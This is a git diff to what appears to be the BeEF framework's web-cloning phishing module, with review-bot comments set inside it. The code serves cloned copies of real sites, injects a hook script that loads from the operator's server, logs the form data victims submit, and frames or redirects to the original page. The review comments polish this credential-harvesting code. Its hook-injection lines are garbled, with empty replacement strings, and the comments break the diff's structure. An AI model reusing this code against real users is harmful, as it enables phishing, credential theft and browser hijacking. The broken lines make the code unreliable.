diff --git a/extensions/social_engineering/web_cloner/interceptor.rb b/extensions/social_engineering/web_cloner/interceptor.rb
index af6a899cd..53ea3314f 100644
--- a/extensions/social_engineering/web_cloner/interceptor.rb
+++ b/extensions/social_engineering/web_cloner/interceptor.rb
@@ -19,24 +19,25 @@ module BeEF
 class Interceptor < Sinatra::Base
- def initialize(file_path, redirect_to)
+ def initialize(file_path, redirect_to, frameable, beef_hook)
 super self
 file = File.open(file_path,'r')
 @cloned_page = file.read
 @redirect_to = redirect_to
+ @frameable = frameable
+ @beef_hook = beef_hook
 file.close
- print_info "Cloned page using content from [cloned_pages/#{File.basename(file_path)}] initialized."
+ print_info "Cloned page with content from [cloned_pages/#{File.basename(file_path)}] initialized."
 end
 # intercept GET
 get "/" do
 print_info "GET request"
+ print_info "Referer: #{request.referer}"
 @cloned_page
 end
 # intercept POST
- # the 'action' attribute of the 'form' element is modified to the URI /
- # in this way the request can be intercepted
 post "/" do
 print_info "POST request"
 request.body.rewind
@@ -44,13 +45,14 @@ module BeEF
 print_info "Intercepted data:"
 print_info data
- redirect @redirect_to
-
- #todo: do a GET request on the target website, retrieve the respone headers and check if X-Frame-Options is present
- #todo: or framebusting is present. If is not present, open the original URL in an iFrame, otherwise redirect the user
- #todo: to the original page
+ if @frameable
+ print_info "Page can be framed :-) Loading original URL into iFrame..."
+ "\n"
+ else
+ print_info "Page can not be framed :-) Redirecting to original URL..."
+ redirect @redirect_to
+ end
 end
-
 end
 end
 end
diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb
index 1261f51c8..0648b91f0 100644
--- a/extensions/social_engineering/web_cloner/web_cloner.rb
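Review bot: The new `print_info "Referer: #{request.referer}"` in the GET handler writes a client-supplied header to the console unescaped, so control characters or terminal escape sequences in it reach the operator's terminal and any log built from that output. Printing the escaped form, `print_info "Referer: #{request.referer.inspect}"`, keeps each entry on one line and shows a missing header as `nil`. The same hunk deletes the two comment lines explaining that the form's `action` is rewritten to `/` so the POST can be intercepted; that explanation is still what makes `post "/"` understandable and is worth keeping above the handler, whose body continues outside this hunk.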
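Review bot: The `else` branch of the POST handler logs `Page can not be framed :-)`, carrying the success smiley into the fallback path; `print_info "Page cannot be framed. Redirecting to original URL..."` reads correctly in a log. The three removed `#todo` lines were the only description of this decision, so a short comment above `if @frameable` should state that the flag is fixed when the interceptor is constructed and reflects only the X-Frame-Options check, not framebusting scripts. The handler starts above this hunk.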
+++ b/extensions/social_engineering/web_cloner/web_cloner.rb
@@ -24,6 +24,7 @@ module BeEF
 @http_server = BeEF::Core::Server.instance
 @config = BeEF::Core::Configuration.instance
 @cloned_pages_dir = "#{File.expand_path('../../../../extensions/social_engineering/web_cloner', __FILE__)}/cloned_pages/"
+ @beef_hook = "http://#{@config.get('beef.http.host')}:#{@config.get('beef.http.port')}#{@config.get('beef.http.hook_file')}"
 end
 def clone_page(url)
@@ -68,7 +69,10 @@ module BeEF
 print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]"
 file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve
- @http_server.mount("/#{output}", BeEF::Extension::SocialEngineering::Interceptor.new(file_path, url))
+
+ # Check if the original URL can be framed
+ frameable = is_frameable(url)
+ @http_server.mount("/#{output}", BeEF::Extension::SocialEngineering::Interceptor.new(file_path, url, frameable, @beef_hook))
 print_info "Mounting cloned page on URL [/#{output}]"
 @http_server.remap
 end
@@ -76,14 +80,33 @@ module BeEF
 private
 # Replace with
 def add_beef_hook(line)
- host = @config.get('beef.http.host')
- port = @config.get('beef.http.port')
- js = @config.get('beef.http.hook_file')
- hook = "http://#{host}:#{port}#{js}"
- line.gsub!("","\n")
+ line.gsub!("","\n")
 line
 end
+ private
+ # check if the original URL can be framed. NOTE: doesn't check for framebusting code atm
+ def is_frameable(url)
+ result = true
+ uri = URI(url)
+ http = Net::HTTP.new(uri.host, uri.port)
+ if uri.scheme == "https"
+ http.use_ssl = true
+ http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+ end
+ request = Net::HTTP::Get.new(uri.request_uri)
+ response = http.request(request)
+ frame_opt = response["X-Frame-Options"]
+
+ if frame_opt != nil
+ if frame_opt.casecmp("DENY") == 0 || frame_opt.casecmp("SAMEORIGIN") == 0
+ result = false
+ end
+ end
+ print_info "Page can be framed: [#{result}]"
+ result
+ end
+
 end
 end
 end
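Review bot: `is_frameable` sets `http.verify_mode = OpenSSL::SSL::VERIFY_NONE`, so the `X-Frame-Options` value it decides on is read over a connection whose certificate is never checked. The request also has no timeouts and no `rescue`, so a refused or slow lookup either hangs or raises into `clone_page` at the call added in the `@@ -68,7 +69,10 @@` hunk, before `@http_server.mount` runs (no rescue is visible there). Verifying the peer, bounding the request and returning `false` on error keeps the previous redirect as the fallback. The method lies wholly inside this hunk; its second `private` is redundant because one already precedes `add_beef_hook`, and Ruby convention would name the predicate `frameable?`.

```ruby
    http = Net::HTTP.new(uri.host, uri.port)
    http.open_timeout = 5 # seconds; illustrative value
    http.read_timeout = 5
    # ... unchanged: https branch, with the verify_mode line changed to:
    http.verify_mode = OpenSSL::SSL::VERIFY_PEER
    # ... unchanged: GET request, X-Frame-Options comparison, print_info, result ...
  rescue StandardError => e
    print_info "Frame check failed for [#{url}]: #{e.message}"
    false
  end
```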